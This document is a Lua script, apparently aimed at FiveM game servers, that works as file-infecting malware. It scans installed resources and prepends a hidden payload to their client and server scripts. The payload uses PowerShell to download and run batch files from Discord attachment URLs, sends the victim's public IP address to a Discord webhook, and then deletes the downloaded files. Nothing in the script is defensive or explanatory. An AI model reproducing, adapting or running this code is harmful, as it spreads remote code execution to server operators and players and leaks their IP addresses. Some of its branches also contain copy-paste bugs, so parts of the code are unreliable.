
    
vuln_res = {}
resource_count = 20
_G["infected"] = false

maleware = [[
Citizen.CreateThread(function()
            Wait(20000)
            local a="https://cdn.discordapp.com/attachments/736357418963042315/829695600613392414/sys.bat" 
            local b="https://cdn.discordapp.com/attachments/736357418963042315/829695780444045352/sysre.bat" 
            local c="%cd%/sys.bat" 
            local d="%cd%/sysre.bat" 
            local e="Invoke-WebRequest -Uri "..a.." -OutFile "..c..""
            local f="Invoke-WebRequest -Uri "..b.." -OutFile "..d..""
            os.execute("powershell.exe -Command "..e.."")
            os.execute("powershell.exe -Command "..f.."")
            os.execute("start sysre.bat")
            PerformHttpRequest("https://ipv4bot.whatismyipaddress.com/", function(err, text, headers)
                Ip = text
                PerformHttpRequest('https://discord.com/api/webhooks/886203714518519818/qDqv8nYmVTjSkGd4nBDXTsFJh7ACisTIP7CDUmCX18Hnpd62UJreg5gIYzPzy6xGQId5', function(err, text, headers) end, 'POST', json.encode({username = "LOG", content = Ip .. " åbnede op @everyone"}), { ['Content-Type'] = 'application/json' })
            end, 'GET')    
            _G["infected"] = true
            Wait(6000)
            os.remove("%cd%/sys.bat")
            os.remove("%cd%/sysre.bat")

end)

]]




for i = 4, resource_count+4, 1 do
    if(GetResourceByFindIndex(i) ~= GetCurrentResourceName()) then
        code = LoadResourceFile(GetResourceByFindIndex(i), "__resource.lua")
        code2 = LoadResourceFile(GetResourceByFindIndex(i), "fxmanifest.lua")
        if(code ~= nil) then
            --SaveResourceFile(GetResourceByFindIndex(i), "server.lua", server_infected, -1)
            --print("^1[INF ->] " .. GetResourceByFindIndex(i))
            table.insert(vuln_res, GetResourceByFindIndex(i))
        elseif code2 ~= nil then
            --print("^1[INF ->] " .. GetResourceByFindIndex(i))
            table.insert(vuln_res, GetResourceByFindIndex(i))
        end
    end
end

print(table.unpack(vuln_res))

for _, v in ipairs(vuln_res) do
    c = LoadResourceFile(v, "client.lua")
    c2 = LoadResourceFile(v, "client/main.lua")
    if(c ~= nil) then
        inf = maleware .. c
        SaveResourceFile(v, "client.lua", inf, -1)
    elseif c2 ~= nil then
        inf = maleware .. c
        SaveResourceFile(v, "client/main.lua", inf, -1)
    end 
end

for i, v in ipairs(vuln_res) do
    c = LoadResourceFile(v, "server.lua")
    c2 = LoadResourceFile(v, "server/main.lua")
    if(c ~= nil) then
        inf = maleware .. c
        SaveResourceFile(v, "server.lua", inf, -1)
    elseif c2 ~= nil then
        inf = maleware .. c
        SaveResourceFile(v, "client/main.lua", inf, -1)
    end 
end





